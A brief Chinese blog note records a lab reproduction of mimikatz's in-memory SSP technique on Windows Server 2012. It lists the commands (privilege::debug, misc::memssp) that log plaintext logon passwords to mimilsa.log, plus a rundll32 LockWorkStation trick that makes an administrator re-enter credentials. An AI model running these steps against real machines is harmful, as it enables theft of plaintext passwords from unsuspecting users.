mimikatz-内存中的SSP
看先知上一个大佬的文章时发现了这种mimikatz抓密码的方法,赶快记录一下。脚本小子一枚,原理什么的根本没有搞懂鸭,以后等没这么菜了,再来补充吧,原文连接和复现过程在下面
原文链接
靶机为windows server 2012,在靶机上依次运行命令
mimikazt.exe
privilege::debug
misc::memssp
exit
然后等用户再次登录输入密码的时候,就会把明文账号密码记录到 C:\Windows\System32\mimilsa.log 文件,输入rundll32.exe user32.dll,LockWorkStation
进入屏保等待管理员输入账号密码就会记录下来,查看文件发现密码已经成功抓到,这里因为测试多次,所以有多个密码
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 现代计算机视觉入门之:什么是图片特征编码
· .NET 9 new features-C#13新的锁类型和语义
· Linux系统下SQL Server数据库镜像配置全流程详解
· 现代计算机视觉入门之:什么是视频
· 你所不知道的 C/C++ 宏知识
· 【译】我们最喜欢的2024年的 Visual Studio 新功能
· 个人数据保全计划:从印象笔记迁移到joplin
· Vue3.5常用特性整理
· 重拾 SSH:从基础到安全加固
· 并发编程 - 线程同步(一)